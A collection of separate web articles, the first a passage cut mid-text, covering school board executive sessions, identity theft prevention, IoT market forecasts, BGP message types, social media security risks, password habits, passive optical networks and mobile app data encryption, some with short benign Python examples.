While there may not be an agenda for a closed meeting if it has been called during an open meeting, there should always be an agenda for pre-announced closed meetings. Executive session board meeting agendas should be detailed. Every possible topic that may need to be discussed at the closed meeting should be included in the executive session board meeting agenda. If the topic is not listed, it should not be discussed. If the discussion surrounding one topic leads to another, the meeting cannot turn to the new topic if it has not been included in the executive session board meeting agenda. Deciding the amount of detail for the executive session board meeting agenda is difficult. The agenda must be detailed enough to validate the closed session but not so detailed that it compromises the confidentiality that makes the meeting necessary. Public school boards must be intentional in how they handle and prepare materials regarding executive session board meetings. While any materials distributed or shared during the executive session board meeting should remain confidential beyond the closed meeting, these documents can be searched and used during litigation. Leveraging an online board management software, board members are able to share and access materials and closed meeting agendas that are only available to users with specific roles, like board members and/or administrators. BoardDocs allows for customized privacy settings for agendas and related documents, so only users with approved roles may have access. An "Event" for the executive session board meeting can be created, with the agenda linked to the event. BoardDocs enables documents and related meeting materials to then be linked to agendas. The interlinking of meeting-related information can greatly simplify the process.
Confidentiality of Executive Session Board Meetings
All board members should be completely aware that executive session board meetings are confidential. If anyone is not in attendance that needs to be briefed, the chair of the board may handle that responsibility. To keep the public school board informed of agenda topics, documents containing confidential information are vital and helpful. For meetings that are paper-based, these materials should be distributed at the beginning of the executive session board meeting and then collected at the close of the meeting. However, school boards can greatly diminish the risk of sensitive information being released by simply making the documents available on a board portal only accessible to authorized users. BoardDocs, a Diligent brand, can be leveraged in reducing the risk of sensitive information being released beyond the closed meeting. All materials can be uploaded into the portal and only be accessed by board members or other approved users. Board information is highly secured with 256-bit encryption, the strongest level of cybersecurity currently available. This level of cybersecurity helps mitigate risks associated with sensitive data.
There are several issues associated with executive session board meetings; however, these risks can be mitigated by being aware and utilizing resources that are designed to help reduce the possibility of any of these issues occurring. When utilizing closed meetings the correct way, boards can still promote trust and transparency with the local community while working toward goals of student and district achievement. Leveraging the right tools, like BoardDocs' online board management software, school boards can effectively, efficiently, and ethically conduct executive session board meetings.
<urn:uuid:816faee1-9ed7-488a-bcfe-0b772574848d>
CC-MAIN-2024-38
https://www.diligent.com/resources/blog/issues-associated-executive-session-board-meetings
2024-09-19T18:31:12Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652055.62/warc/CC-MAIN-20240919162032-20240919192032-00507.warc.gz
en
0.950608
1,314
2.59375
3
ID Theft Defense

Identity theft occurs when someone steals your personal information and uses it to make money, open new accounts, file tax returns, make medical claims, and much more without your authorization. Identity theft affects 1 in 20 Americans, but only around 0.14% of identity theft criminals are arrested. Fortunately, there are many ways you can protect yourself from identity theft.

Signs of Identity Theft:
- Unauthorized Payments: When you receive your bank statement, check each transaction. Any transaction you don't recognize may indicate that someone else is using your identity and information. Contact your bank to protect your financial assets.
- Credit Cards and Loans: Check whether any credit accounts have been opened, or any loans issued, that you did not apply for. You may not notice on your own, so review your credit history often for unusual activity.
- Inaccurate Documentation: Inaccurate information on official documents, such as your credit reports or medical records, can be a sign that someone else is using your information.
- Removed Access: If you cannot access official accounts, a hacker may have taken them over and changed the username and password so that you can no longer log in. These accounts could include your credit reports, bank accounts, and more.
- Verify Identity: If you cannot verify your identity when applying for government documents, such as a passport or driver's license, this could be a sign that your identity has been stolen.

Types of ID Theft:
- Financial identity theft: The most common type, where a thief steals your financial information, such as your credit card number, bank account details, or Social Security number, and uses it to make unauthorized purchases or withdraw money from your accounts.
- Criminal identity theft: A thief uses your personal information, such as your name, date of birth, or Social Security number, to commit crimes. The thief may use your identity to avoid arrest, obtain employment, or receive medical care.
- Medical identity theft: Occurs when someone uses your personal information to obtain medical services, prescription drugs, or insurance coverage. This type of identity theft can also result in false entries being added to your medical records, compromising your health care.
- Synthetic identity theft: The thief creates a new identity using a combination of real and fake information; for example, an actual Social Security number paired with a phony name and address to apply for credit.
- Child identity theft: A thief uses a child's personal information to open bank accounts, apply for credit, or commit other forms of identity theft. Children's identities are particularly valuable to thieves because the theft often goes undetected for years, allowing the stolen identity to be used for an extended period.
- Tax identity theft: A thief uses your Social Security number to file a false tax return and claim a refund. Tax identity theft can result in delayed tax refunds, additional taxes owed, and other financial difficulties.

What To Do If Your Identity is Stolen?
If you know that your identity has been stolen, there are several steps you can take to protect yourself.
- Report it online at IdentityTheft.gov.
- Report it to a local police station.
- Report it to the Social Security Administration.
- File a claim with your identity theft insurance provider, which may reimburse costs you incurred when a cybercriminal stole your identity.
- Freeze your credit so the criminal can no longer use your information and money for personal gain.

How to Prevent ID Theft:
- Secure your personal information with Agency. Agency provides ID Theft Coverage and 24/7 Security Monitoring to watch your personal information for suspicious activity.
- Review your billing cycles and card statements regularly. Even a small, unrecognizable transaction can be a sign that your information has been stolen; regular checks help you notice identity theft sooner.
- Keep your credit reports frozen until you open a new credit card account or apply for a loan. This way, an identity thief cannot create new accounts or take out unauthorized loans.
- Use a different password for every login. A password manager makes this practical, and unique passwords keep a hacker or scammer who steals one credential from accessing your information on multiple platforms (a short example of generating strong, unique passwords appears after this list).
- Install a firewall and virus-detection software so your data cannot easily be extracted from your personal device. Consider purchasing cybersecurity software from Agency, which offers 24/7 real-time monitoring and response, VPNs, Next-Gen Antivirus/EDR, ID Theft Coverage, and more. Protect yourself from online threats with the right cybersecurity tools.
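To make the unique-password advice concrete, here is a minimal sketch of how strong, distinct passwords can be generated with Python's standard-library `secrets` module. The account names and character set are illustrative assumptions, not a recommendation for any particular product:

```python
import secrets
import string

# Draw from upper- and lowercase letters, digits, and common symbols
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"

def generate_password(length: int = 16) -> str:
    """Return a cryptographically strong random password."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

# One unique password per account, never reused across sites
for site in ("bank", "email", "shopping"):  # placeholder account names
    print(site, generate_password())
```

In practice you would store these in a password manager rather than printing them; the point is that `secrets`, unlike the general-purpose `random` module, is designed for security-sensitive randomness.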
<urn:uuid:a48dbef6-69e6-47f8-83f4-fb4259f5b999>
CC-MAIN-2024-38
https://blog.getagency.com/personal-cybersecurity/what-is-id-theft-defense/
2024-09-08T19:09:40Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00607.warc.gz
en
0.921727
1,027
2.703125
3
While there's been a lot of argument over how the Internet of Things will work -- issues ranging from data privacy, to security, to the eventual role of artificial intelligence in our daily lives -- the real economic impact of these technologies remains somewhat elusive. However, a new report from McKinsey & Company's Global Institute tries to put a real dollar amount on the global IoT market. By the report's estimate, IoT has the potential to be worth between $3.9 trillion and $11.1 trillion by 2025. At the top end, that means IoT could represent about 11% of the world's economy. The McKinsey study, "The Internet of Things: Mapping the Value beyond the Hype," is a market-focused report rather than a strictly technical one. Although the IoT concept remains muddled, the report contains several valuable insights. First, the report -- released June 29 -- tries to define what IoT really means, a task many others have attempted without reaching consensus. The authors define IoT overall as digitizing the physical world, which seems reasonable. They exclude systems whose sensors exist primarily to receive intentional human input, such as smartphone apps driven by a touchscreen, or networked computer software whose "sensors" are the standard keyboard and mouse. As the report states: "Our central finding is that the hype may actually understate the full potential of the Internet of Things -- but that capturing the maximum benefits will require an understanding of where real value can be created and successfully addressing a set of systems issues, including interoperability." In other words, the authors see plenty of potential in IoT, but it needs to be engineered carefully to deliver true value. The report also departs from the usual methodology: it uses bottom-up economic modeling to estimate the economic impact of IoT by the potential benefits it can generate. This includes productivity improvements, time savings, and improved asset utilization, as well as an approximate economic value for reduced disease, accidents, and deaths. The authors admit these estimates of potential value are not equivalent to industry revenue or GDP, because they include value captured by customers and consumers. The report concludes with nine different scenarios, along with estimated segment valuations:
- Vehicles: Autonomous vehicles and condition-based maintenance: $210 billion to $740 billion
- Cities: Public health and transportation: $930 billion to $1.7 trillion
- Outside: Logistics and navigation: $560 billion to $850 billion
- Human: Health and fitness: $170 billion to $1.6 trillion
- Worksites: Operations optimization, as well as health and safety: $160 billion to $930 billion
- Retail environments: Automated checkout: $410 billion to $1.2 trillion
- Factories: Operations and equipment optimization: $1.2 trillion to $3.7 trillion
- Offices: Security and energy: $70 billion to $150 billion
- Home: Chore automation and security: $200 billion to $350 billion

The question then is: What does the IoT market mean for IT and for the CIOs who will have to plan corporate strategies around technology that could be worth trillions in just 10 years' time?
The report sees IoT as giving rise to opportunities that can transform existing business models through predictive maintenance, better asset utilization, and higher productivity. The authors also expect new business models to arise, such as remote monitoring, that will enable anything-as-a-service. In its summary, the report offers a couple of specifics that IT and CIOs should pay attention to. One is that most of the data collected by IoT devices today is not used, and what data is collected is not fully exploited. In addition (and this is important), B2B applications have much greater potential than consumer ones, meaning IoT is in many ways an enterprise application.
<urn:uuid:17790e0f-1d13-4e57-a209-e6ac13f09998>
CC-MAIN-2024-38
https://www.informationweek.com/it-leadership/iot-market-forecast-at-11-trillion-report-finds
2024-09-13T18:31:49Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00207.warc.gz
en
0.95467
901
2.921875
3
When a router is in the Connect state, it is waiting for the TCP connection to complete. To do this, the two neighbors must perform the standard TCP three-way handshake and open a TCP connection to port 179, just as a web client and server do when opening an HTTP session. BGP utilizes the same TCP three-way handshake to form a neighborship, and all BGP messages are unicast to the one neighbor over that TCP connection.

BGP Message Types

The different types of BGP message are:

BGP Message Type I: OPEN
Open messages are used to start a BGP session over an existing TCP session. Once two BGP routers have completed the TCP three-way handshake, they attempt to establish a BGP session using Open messages. The Open message carries information about the sending router, which uses it to identify itself and to specify its BGP operational parameters. An Open message is always sent once the TCP session is established between neighbors. Its fields are:
- Version – specifies the BGP version (2, 3, or 4), the default being version 4.
- Autonomous System – provides the AS number of the sender. It determines whether the BGP session is EBGP or IBGP (the session is IBGP if the AS numbers are the same).
- Hold-Time – indicates the maximum number of seconds that can elapse without receipt of a message before the transmitter is assumed to be nonfunctional. The default hold time is 180 seconds. If the neighbors' hold times differ, the lower of the two becomes the accepted hold time.
- BGP Identifier – provides the BGP identifier of the sender (an IP address). IOS determines the identifier exactly as it does the OSPF router ID: the highest loopback interface address is used; if there is no loopback, the numerically highest IP address on a physical interface is selected.
- Optional Parameters Length – indicates the length, or absence (with a zero value), of the optional parameters field.
- Optional Parameters – contains a list of optional parameters, such as authentication, multiprotocol support, and route refresh. It includes:
  - Support for MP-BGP (Multi-Protocol BGP).
  - Support for Route Refresh.
  - Support for 4-octet AS numbers.

BGP Message Type II: KEEPALIVE
If a router accepts the parameters specified in the Open message, it responds with a Keepalive. By default, Cisco sends a keepalive every 60 seconds, or a period equal to one-third of the hold time.

BGP Message Type III: UPDATE MESSAGE
Advertises feasible routes, withdrawn routes, or both. The Update message contains five fields:
- Unfeasible Routes Length – indicates the total length of the withdrawn routes field, or that the field is not present.
- Withdrawn Routes – contains a list of IP address prefixes for routes being withdrawn from service: (Length, Prefix) tuples describing destinations that have become unreachable.
- Total Path Attribute Length – indicates the total length of the path attributes field, or that the field is not present.
- Path Attributes – describes the characteristics of the advertised path. The following are possible attributes for a path.
  - Origin: Mandatory attribute that defines the origin of the path information.
  - AS Path: Mandatory attribute composed of a sequence of autonomous system path segments.
  - Next Hop: Mandatory attribute that defines the IP address of the border router that should be used as the next hop to the destinations listed in the network layer reachability information field.
  - Multi Exit Disc: Optional attribute used to discriminate between multiple exit points to a neighboring autonomous system.
  - Local Pref: Discretionary attribute used to specify the degree of preference for an advertised route.
  - Atomic Aggregate: Discretionary attribute used to disclose information about route selections.
  - Aggregator: Optional attribute that contains information about aggregate routes.
- Network Layer Reachability Information (NLRI) – contains a list of IP address prefixes for the advertised routes.

BGP Message Type IV: NOTIFICATION MESSAGE
This message is sent whenever an error is detected, and it causes the BGP connection to close. Its fields are:
- Error Code – indicates the type of error that occurred. The following error types are defined:
  - Message Header Error: a problem with a message header, such as an unacceptable message length, marker field value, or message type.
  - Open Message Error: a problem with an Open message, such as an unsupported version number, an unacceptable autonomous system number or IP address, or an unsupported authentication code.
  - Update Message Error: a problem with an Update message, such as a malformed attribute list, an attribute list error, or an invalid next-hop attribute.
  - Hold Time Expired: the hold time has expired, after which a BGP node is considered nonfunctional.
  - Finite State Machine Error: an unexpected event.
  - Cease: closes a BGP connection at the request of a BGP device in the absence of any fatal errors.
- Error Subcode – provides more specific information about the nature of the reported error.
- Error Data – contains data based on the error code and error subcode fields, used to diagnose the reason for the notification message.
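All four message types share a common fixed-size 19-byte header: a 16-byte marker (all ones), a 2-byte length, and a 1-byte type code (1 = OPEN, 2 = UPDATE, 3 = NOTIFICATION, 4 = KEEPALIVE, per RFC 4271). As a minimal illustration (an educational sketch, not a complete BGP implementation), the following Python snippet parses such a header:

```python
import struct

# Message type codes from RFC 4271
BGP_TYPES = {1: "OPEN", 2: "UPDATE", 3: "NOTIFICATION", 4: "KEEPALIVE"}

def parse_bgp_header(data: bytes):
    """Parse the fixed 19-byte header that precedes every BGP message."""
    if len(data) < 19:
        raise ValueError("BGP header is 19 bytes")
    marker, length, msg_type = struct.unpack("!16sHB", data[:19])
    if marker != b"\xff" * 16:
        raise ValueError("marker field must be all ones")
    if not 19 <= length <= 4096:
        raise ValueError("length outside the 19-4096 byte range BGP allows")
    return BGP_TYPES.get(msg_type, "UNKNOWN"), length

# A Keepalive is just the bare header: marker, length 19, type 4
keepalive = b"\xff" * 16 + struct.pack("!HB", 19, 4)
print(parse_bgp_header(keepalive))  # ('KEEPALIVE', 19)
```

This also shows why the Keepalive is the smallest possible BGP message: it consists of the 19-byte header and nothing else.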
<urn:uuid:31e7731f-17cb-4c8f-8679-9d0715e1312c>
CC-MAIN-2024-38
https://ipwithease.com/bgp-message-types/
2024-09-19T21:10:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00607.warc.gz
en
0.841845
1,246
2.53125
3
In the space of just a few years, social networking sites have grown to form some of the largest communities in the world, but what impact are they having on privacy and the security of information? Michael Hill investigates. The digital age has seen its fair share of phenomena grow and develop from modest beginnings to become integral parts of everyday life, but few have done so quite as remarkably as social networks, which now form some of the largest communities on the planet. In 2004, Mark Zuckerberg and peers at Harvard College launched ‘The Facebook’. Originally a networking site restricted to students of Harvard, within a month the service was being used by more than half of Harvard undergraduates. Two years later and after a slight name change, Facebook became publicly available to anyone aged 13 years or more with a valid email address. Whilst Facebook wasn’t the first social networking service to come along, it has certainly grown to be the biggest. Earlier this year, findings from Statista revealed that, as of August 2017, Facebook had a staggering two billion active users worldwide. That was some 800 million more than the next largest, the Facebook-owned WhatsApp messaging service (created in 2010), used by 1.2 billion people across the globe. The statistics also showed that photo- and video-sharing service Instagram had, in just the seven years since it was founded, gained 700 million users, with Twitter (320 million users), Snapchat (255 million users) and LinkedIn (106 million) all included in Statista’s top 20 most popular social network sites. Whether it’s tweeting, checking in, sharing photos, going live or professional networking, more and more of us are interacting with social media to digest, swap and share our personal lives. Likewise, it has also transformed the way enterprises go about conducting their business, with companies of all sizes taking to networking sites to build their brands, advertise new job vacancies, engage in customer feedback and initiate campaigns. Social media growth shows no signs of slowing. It is estimated that there will be more than three billion social media users around the globe by 2020, up from 900 million in 2010. Further, a Cisco study predicts that mobile video traffic, often considered the future of social media with video sharing already very popular among social network users, will account for 75% of total mobile data traffic within the next three years. With its speed of evolution, widespread popularity and ambiguous nature, social media is having a significant impact on the security of data and privacy, providing means of solving some of the problems the information security industry faces whilst, at the same time, creating a whole host of others. “Social media platforms are like any tool,” Raef Meeuwisse, author of Cybersecurity for Beginners and external relations director, ISACA London Chapter, tells Infosecurity. “Whether they are something of great value or great harm really depends on how they are used. Effective use of social media can enhance both your career prospects and security. Conversely, using those same platforms unwisely can have exactly the opposite effect.” Sharing information is what makes the internet such a wondrous, sophisticated tool, and it simply wouldn’t exist without it. However, information sharing is not always a good thing and, when it comes to social media profiles, some users have developed a culture of ‘over-sharing’ which can put them and those around them at risk.
"Whether they are something of great value or great harm really depends on how they are used" You Are What You Share “Social media has been a complete game changer as people have gradually become accustomed to sharing data widely and trusting people more readily,” says Jenny Radcliffe, social engineer, speaker and host of The Human Factor podcast. “These days, a huge amount of data is easily obtainable in almost no time due to the amount of information held on people on various sites, as well as most people's readiness to share anything and everything about their lives.” These days, users may not understand concerns around sharing information. We do a great deal of socializing online and it can enrich our lives, but the fact is, social media sites have also become ‘treasure-troves’ of data from which cyber-criminals can and do source a lot of the information they need to craft and carry out their attacks. “Malicious social engineers use social media to research their target organizations’ employees,” explains Sharon Conheady, director of First Defence Information Security and a founding member of The Risk Avengers. “Most people don’t realize how much information they publish about themselves and rarely consider how it could be used against them.” This information is useful in so many ways to a malicious individual, Radcliffe adds. “Whether it’s helping to build a profile of the organization to aid spear phishing emails, gain information as to site layouts and operational details, or even to find the psychological levers that will help coerce an individual into compliance, information is often the key to a successful attack and yet people generally are very careless about sharing it.” The Trouble with Trust As Robert Schifreen, founder and editor of SecuritySmart.co.uk explains, users have a tendency to put absolute trust in social media, and it is that trust that causes a lot of the security and privacy problems that follow. “People generally assume that all their faceless friends and contacts are genuine and are telling the truth all the time, and that all the information they post and share is safe to do so,” he says. “However, it's so easy to pretend to be someone on social media – you can be anyone you like. Want to elicit confidential information from an employee at Company X? Just set up profiles on Facebook and LinkedIn, pretending to be someone who also works in that company, and you'll get follow-backs and likes from lots of people who think you're their colleague. You then get to hear all the gossip, or you can even invent your own and start spreading it.” Also, he adds, getting ransomware onto someone's computer is much easier if the recipient thinks they know the sender, as they then won't think twice about clicking on the link or attachment. “Trying to educate people is really hard,” warns Schifreen. “You need to change their default way of thinking, in environments such as email and social media, from ‘why might this not be genuine?’ to ‘why might this be genuine?’” Schifreen points to one particular scheme he is aware of, where a company offered a weekly prize to the employee who reported the largest number of phishing emails to the IT department. “This worked really well, and had the desired effect of making people question every social media post and email message that they encountered. 
We need to see more companies setting up similar schemes.”

A Risky Business

Whilst social media used to be something that people would use solely in their personal lives, its presence in the enterprise arena has grown significantly in recent years. From companies implementing it intentionally and strategically in their business operations, to users logging in to their favorite social media site themselves, with or without administrative permission to do so, both can bring added risks to an organization’s security, privacy and compliance postures. “Corporate security and personal security are very much intertwined,” Conheady says. “If employees don’t look after their personal security, this can lead to corporate security issues, especially where employees have remote access or in a BYOD environment. Even without this, employees who are lax about their personal security are more likely to fall for social engineering attacks that can have serious consequences for both the individual and their employer.” Schifreen agrees, stating that whilst corporate spam filters may block some unsolicited emails carrying dodgy links, corporate executives and people holding key positions are only too willing to freely open links in Twitter, Facebook or LinkedIn. “It’s also a reputational/PR management thing,” he adds. “You need to ensure that people don't post officially on behalf of the company unless they're trained and authorized to do so – and that grievances are dealt with in private rather than in public forums. Legally, it's important to ensure that staff don't make promises that the company is unable to keep, because something said only semi-seriously online could be regarded as binding by a good lawyer if the person who said it could be reasonably expected to have the authority to have done so.”

Not All Bad

Thus far it all seems pretty gloomy when it comes to the impact that social media growth has had on efforts to keep data safe and secure. However, as Meeuwisse argues, that may not necessarily be the case – at least, it doesn’t have to be. “Many of the leading social media platforms have some of the best security authentication available,” he says. An accurate statement: all of the main social networking platforms offer various security and privacy settings which can be tailored to suit the circumstances of individual users. “Some also offer their authentication as a service to help you maintain your log-in at other sites,” Meeuwisse continues. “If you decide to use the stronger security options on offer, which can include two-factor authentication and a restricted list of authorized devices, using your social media account to help control your online identity can help improve your security.” Meeuwisse’s example is apt: strategies for better, quicker and stronger authentication have been sought after for some time, particularly in the last few years when the efficiency and reliability of traditional passwords has been seriously questioned. Social networking platforms have the potential to help here. “What we already see happening is that many technologies no longer try to run their own authentication but instead use log-in authorization options from Facebook, Twitter, LinkedIn, Google or other global technology companies.
That trend is likely to gather momentum as the price and sophistication of correctly authenticating access starts to go beyond the affordability of most applications and organizations.” Although, Meeuwisse is quick to point out that “if you do choose to use a social media account as an authentication option for other services, but do not invest time in setting up robust security options (for example, a long, strong password plus two factor authentication) – then rather than improving your security, you will have weakened it.”

A Question of Responsibility

What’s apparent is that social media has the potential to be both a means of strengthening data security and the privacy of information, and a vector that can seriously threaten both. But where does the responsibility lie to ensure it’s the former? "The responsibility for how our data is used lies with social media companies and bodies like the Information Commissioner’s Office who oversee data protection regulation,” explains Pam Cowburn, communications director at Open Rights Group. “Privacy policies and terms and conditions should be written in clear language that explains how our data will be used. The ICO should also help people to understand their data protection rights.” Schifreen agrees, suggesting that morally and legally (to a degree), responsibility should lie with the social media company itself to ensure security. However, he admits that in practice it often falls to users, something that is especially important to get right when it comes to youngsters. “The most worrying thing for me is that the age of people using social media is dropping all the time,” Radcliffe adds. “A youngster is clearly at risk online from any number of different types of threat but they very often have even less of the judgement filters that an adult might have in terms of suspicious behavior. Keeping children and young people safe online should be a priority for us all.” If there’s one piece of advice that Radcliffe wants users to take, it’s to be very careful about how much information they share online and who can see it. “We all live in a digital age and benefit from social media but we don't have to put everything about ourselves out there! Think before you post and be more cautious, the world does not need to know everything about you”, she concludes. Sound advice indeed!
<urn:uuid:99e67a06-0304-4f2d-b839-7e9d59af4b3b>
CC-MAIN-2024-38
https://www.infosecurity-magazine.com/magazine-features/security-social-network-good-bad/
2024-09-19T20:51:45Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652067.20/warc/CC-MAIN-20240919194038-20240919224038-00607.warc.gz
en
0.964175
2,627
2.828125
3
We’ve all been there. You sign up to a new website or app, and you're faced with the dreaded process of registering an account. We default to a password we’ve used in hundreds of other places, or to something simple such as a first pet’s name followed by 123. Simply put, we have too many passwords to remember. In fact, a study conducted by NordPass found that the average person has 100 passwords. It is inevitable that a person will reuse a password. Luckily, we live in a modern era with multiple tools at our disposal to sharpen our cyber defences. Here we share five ways in which you can better protect your personal information.

The Do's and Don'ts for better password habits.
<urn:uuid:e0fff867-c0eb-4325-971a-6ed8f0205705>
CC-MAIN-2024-38
https://www.goldphish.com/post/the-do-s-don-ts-for-world-password-day
2024-09-21T03:35:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701427996.97/warc/CC-MAIN-20240921015054-20240921045054-00507.warc.gz
en
0.943342
162
2.703125
3
When you read or hear PON, the discussion is about a passive optical network. While it is a commonly used type of network, some may not understand what a passive optical network is or how it works. Here is a basic overview of passive optical networks.

What is a Passive Optical Network?

A passive optical network is a telecommunications network that uses fiber optic lines to transmit data. It is considered passive because the splitters used to route the data are unpowered. These unpowered splitters send the data from the main location out to a number of different destinations (a worked splitter-loss example appears at the end of this overview). A passive optical network is a point-to-multipoint system rather than a point-to-point system, which makes it more efficient and cost-effective for providing customers with access to the Internet.

Passive Optical Network Terminology

Some acronyms used when managing a passive optical network include the following:
- OLT - Optical Line Terminal - The central location (the provider's endpoint) of the passive optical network
- ONU - Optical Network Unit - The separate destination endpoints of the passive optical network
- FTTN - Fiber to the Neighborhood - Lines that terminate outside of buildings, at a neighborhood node
- FTTC - Fiber to the Curb - Similar to fiber to the neighborhood, but terminating closer to the premises, at the curb
- FTTB - Fiber to the Building - Lines that extend to the buildings themselves
- FTTH - Fiber to the Home - Like fiber to the building, but the fiber runs all the way to the individual home

Passive Optical Networks with FiberPlus

FiberPlus has been providing data communication services for a number of different markets through fiber optics since 1992. What began as a cable installation company for Local Area Networks has grown into a top telecommunications business that provides the Richmond, VA, Baltimore, MD, Washington, DC, and Northern Virginia areas with a number of different services. These services now include:
- Structured Cabling
- Electronic Security Systems
- Distributed Antenna Systems
- Audio/Visual Services
- Support Services
- Specialty Systems
- Design/Build Services

FiberPlus promises the communities in which we serve that we will continue to expand and evolve as new technology is introduced within the telecommunications industry.
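Returning to the unpowered-splitter idea above: an ideal 1:N splitter divides the optical power N ways, a loss of 10·log10(N) dB, and real splitters add some excess loss on top. The following Python sketch works through an illustrative power budget; every figure in it (launch power, receiver sensitivity, per-kilometer loss) is an assumed example value, not a vendor specification:

```python
import math

def splitter_loss_db(n_ways: int, excess_db: float = 1.0) -> float:
    """Ideal 1:N split loss in dB, plus an assumed excess loss."""
    return 10 * math.log10(n_ways) + excess_db

# Illustrative downstream budget for a 1:32 PON over 20 km of fiber
tx_power_dbm = 3.0           # assumed OLT launch power
rx_sensitivity_dbm = -28.0   # assumed ONU receiver sensitivity
fiber_loss_db = 0.35 * 20    # assumed ~0.35 dB/km attenuation
split_db = splitter_loss_db(32)

margin_db = tx_power_dbm - fiber_loss_db - split_db - rx_sensitivity_dbm
print(f"1:32 split loss ~{split_db:.1f} dB, link margin ~{margin_db:.1f} dB")
```

Doubling the split ratio costs about 3 dB of margin, which is why operators trade split ratio (how many subscribers share one port) against reach.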
<urn:uuid:2317b54a-5c72-475a-9738-488f3e3698b2>
CC-MAIN-2024-38
https://www.fiberplusinc.com/blog/all-about-passive-optical-networks/
2024-09-07T17:09:44Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00807.warc.gz
en
0.932037
452
2.890625
3
Protect Mobile App Data Using Data Encryption

Learn to protect data stored in mobile apps using encryption in mobile CI/CD with a Data-Driven DevSecOps™ build system.

What is Data Encryption

Data encryption is the process of encoding information. Encryption transforms the original representation of the information from human-readable 'plaintext' into a non-human-readable form known as 'ciphertext'. Only authorized parties, which hold the decryption key, can decipher (decrypt) ciphertext back to plaintext in order to read or access the original information. The main goal of encryption is to prevent unauthorized parties from reading private, confidential or sensitive data. Data encryption is one of the most important ways to protect data stored or used in a mobile app.

The Three States of Mobile App Data

There are three states in which data exists in mobile apps:
- Data at rest is mobile app data that is persistent and stored in the application sandbox and installation directory.
- Data in transit is mobile app data sent from the app to outside servers or other app users.
- Data in use (aka data in memory) is data the mobile app temporarily stores in application memory, including data at rest and data in transit before they are sent or saved.

Data-at-rest and data-in-use encryption are enabled as part of TOTALData™ Encryption.

What Does Appdome Data-at-Rest Encryption Protect?

Overview of Appdome's TOTALData™ Encryption

Using Appdome data-at-rest encryption, all data generated by the app is encrypted at runtime using industry-standard AES-256 cryptographic protocols. You can also choose to encrypt data in use/in memory, where all data temporarily stored in application memory is encrypted before it is sent or saved. With Appdome, encryption is accomplished dynamically, without any dependencies on the data structure, databases or file structures. Appdome uses 256-bit AES-CTR encryption, which is faster when accessing partial files (i.e., when reading a buffer from a file or mapping part of a file into memory). This is much more efficient than the AES-CBC encryption used by most third-party SDKs and encryption libraries, which forces encryption or decryption of the entire file even when only a small block within it needs to be read. Appdome's mobile TOTALData™ Encryption implementation does not impact app behavior. This results in a consistent and easy-to-implement experience, as opposed to a DIY approach in which the mobile developer must choose encryption components from a wide variety of libraries, cipher strengths, and key stores, and then integrate them together. Like all integrations on Appdome, customers can integrate just data-at-rest or data-in-use encryption, or they can combine this feature with any or all other features from Appdome's Mobile Security Suite. They can even combine Appdome Mobile Security with multiple third-party SDKs and APIs, forming countless service combinations and integrations in any mobile app. On Appdome, there is never any coding, and all integrations are completed in under a minute.

Advanced Configuration Options for Mobile TOTALData™ Encryption

Appdome also provides options for customers to exclude certain files or folders from encryption: one option automatically excludes all media files, and another lets you name specific files to exclude. Appdome dynamically generates symmetric data encryption keys at runtime.
Keys are generated using industry-standard AES mechanisms; they are never stored on the device and are derived at runtime. In addition, Appdome can factor contextual information such as bundle ID, device ID, checksums, user input (passwords, tokens), and application state conditions (e.g., the presence of a debugger) into the key derivation mechanism. For advanced users, Appdome also provides an option to control parts of the key management process via an external key management system (KMS); with this option, additional external factors may be introduced for key derivation. Like all features in the Appdome Mobile Security Suite, customers can implement this feature standalone, or combined with other mobile security features or third-party SDKs/APIs, all of which can be integrated into any mobile app in minutes with no coding.
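Appdome's actual derivation scheme is proprietary, so the following Python sketch is only a hedged illustration of the general pattern described above: derive a 256-bit key at runtime from contextual inputs with a key derivation function, then encrypt with AES-CTR. It uses the third-party `cryptography` package; the contextual inputs shown are placeholders, and a real design would also have to mix in material an attacker cannot simply read off the device:

```python
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Placeholder runtime context (bundle ID, device ID, build checksum)
context = b"com.example.app|device-1234|build-checksum"

# Derive a 256-bit AES key at runtime; no key is persisted on the device
key = HKDF(algorithm=hashes.SHA256(), length=32,
           salt=None, info=b"data-at-rest").derive(context)

nonce = os.urandom(16)  # CTR mode requires a unique nonce per message
encryptor = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
ciphertext = nonce + encryptor.update(b"sensitive app data") + encryptor.finalize()

# Decrypt; a CTR keystream can also be positioned at an arbitrary block,
# which is what makes partial-file reads cheap compared with CBC
decryptor = Cipher(algorithms.AES(key), modes.CTR(ciphertext[:16])).decryptor()
print(decryptor.update(ciphertext[16:]) + decryptor.finalize())
```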
<urn:uuid:d6a7a563-0a24-477d-8d73-fefb5be4863b>
CC-MAIN-2024-38
https://www.appdome.com/how-to/mobile-app-security/mobile-data-encryption/mobile-app-data-encryption-explained/
2024-09-12T16:41:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00407.warc.gz
en
0.902155
909
2.84375
3
